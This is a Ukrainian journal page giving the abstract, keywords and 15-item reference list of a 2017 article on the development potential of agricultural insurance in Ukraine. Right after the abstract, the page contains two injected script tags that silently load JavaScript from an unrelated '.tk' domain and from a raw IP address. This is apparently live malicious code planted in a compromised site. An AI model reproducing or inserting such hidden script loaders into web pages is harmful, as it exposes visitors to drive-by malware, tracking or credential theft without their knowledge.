ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 368:338.43
Фінансові відносини та бухгалтерський облік

Оцінка потенціалу розвитку страхування cільськогосподарської продукції в Україні / Віленчук О.М. // Економіка АПК. - 2017. - № 8 - С. 56

Метою статті є оцінювання потенційних можливостей страхування сільськогосподарської продукції в Україні у територіальному, галузевому й інституціональному вимірах та формулювання пропозицій щодо його реалізації. Методологічною основою дослідження були загальнотеоретичні методи наукового пізнання: індуктивний, дедуктивний, абстрактно-логічний, аналізу і статистики, монографічний, проблемний, графічний, системно-структурний та порівняльний аналіз. За результатами дослідження встановлено, що в Україні сконцентровано значний потенціал розвитку аграрного страхування. Таке твердження ґрунтується на сукупності трьох взаємозв’язаних складових потенціалу, а саме: наявність земель сільськогосподарського призначення, виробників аграрної продукції й страхових компаній, які надають відповідні послуги юридичним і фізичним особам у сільській місцевості. Оцінювання потенціалу аграрного страхування показує, що стан його використання знаходиться на низькому рівні, який не забезпечує належного захисту майнових інтересів потенційних страхувальників. Як елемент наукової новизни, обґрунтовано необхідність докапіталізації вітчизняних страхових компанії як однієї з ключових умов активізації процесу страхування сільськогосподарських ризиків. Практична значущість - проведено оцінювання потенціалу розвитку аграрного страхування в трьохрівневому вимірі. Сформульовано пропозиції щодо забезпечення поступової реалізації існуючого потенціалу в інтересах учасників страхового процесу. Табл.: 4. Рис.: 1. Бібліогр.: 15.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: аграрне страхування, застрахована площа, потенціал, сільськогосподарські культури, страхові суми, страхові премії, страхові компанії

Список використаних джерел

 1. Алескерова Ю.В. Розвиток сільськогосподарського страхування: теорія, методологія практика: моногр. // Ю.В. Алескерова. - Вінниця: ТОВ “Видавництво - друкарня Діло”, 2015. - 368 с.
 2. Залетов А.Н. Показатели деятельности страховых компаний Украины за 2016 г. / А.Н. Залетов // Insurance Top рейтинг страховых компаний. - 2017. - № 1(57) - С. 43-47.
 3. Навроцький С.А. Стан та тенденції розвитку сільськогосподарського страхування / С.А. Навроцький // Наука й економіка. - 2012. - Вип. 1. - С. 61-69.
 4. Національна комісія, що здійснює державне регулювання у сфері ринків фінансових послуг [Електронний ресурс]. - Режим доступу: http://www.dfp. gov.ua.
 5. Остапенко О.М. Удосконалення вітчизняної системи страхування з урахуванням зарубіжного досвіду / О.М. Остапенко // Економіка: реалії часу. - 2013. - № 5 (10). - С. 19-30.
 6. Площі, валові збори та врожайність сільськогосподарських культур, ягід і винограду (остаточні дані) у 2016 р.: Стат. бюл. / Державна служба статистики України. - К., 2017. - 186 с. [Електроний ресурс]. - Режим доступу: http://www.ukrstat.gov.ua/druk/publicat/kat_u/publ7_u.htm.
 7. Соціально-економічний потенціал сталого розвитку України та її регіонів: нац. доп. ; за ред. академіків НАН України Е.М. Лібанової та М.А. Хвесика // Державна установа “Інститут економіки природокористування та сталого розвитку НАН України” - К., 2014. - 776 с.
 8. Чічкало-Кондрацька І.Б. Новий підхід до оцінки резервів відновлення і розвитку виробничого потенціалу підприємства / І.Б. Чічкало-Кондрацька // Регіональні перспективи. - 2000. - № 1. - С. 18-20.
 9. Якубович В. Ринок агрострахування України у 2016-му андерайтинговому році: аналітичне дослідження Проекту “Розвиток фінансування аграрного сектору в Європі та центральній Азії” / В. Якубович // Word Bank Group International Finance Corporation (IFC). - 18 жовтня 2016. - 28 с. [Електронний ресурс] / Режим доступу: http://www.agroinsurance.com.
 10. Glauber J.W. Agricultural Insurance and the Word Trade Organization / IFPRI, Discussion PAPER 01473. - October 2015. - 41 p.
 11. Graber J.A. dip into newer P &amp;C opportunities /18th International Investots’s Day Frankfurt, 14 October 2015.
 12. Maxul O. Government Support to Agricultural Insurance: Challenges and portunities for Developing Countries / О. Maxul, C. Stutley - Washington DC: The World Bank, 2010. - 250 p.
 13. Yakubovich V. Agricultural Insurance Market in Ukraine: Eca Agri-Finance Project / Word Bank Group International Finance Corporation (IFC). - April, 2016. - 38 p. - http://www.agroinsurance.com.
 14. Zarkovic N. Key Features of Crop Insurance in Serbia / N. Zarrovic, B. Toscano, D. Mrksic and M. Lisov // Bulgarian Journal of Agricultural Science, 20 (No 1) 2014. - 23-33 p.
 15. 2016 Crop Insurance Handbook. Undited States Department of Agriculture Risk Management Agency. - 828 p.

Читати статтю: e_apk_2017_8_9.pdf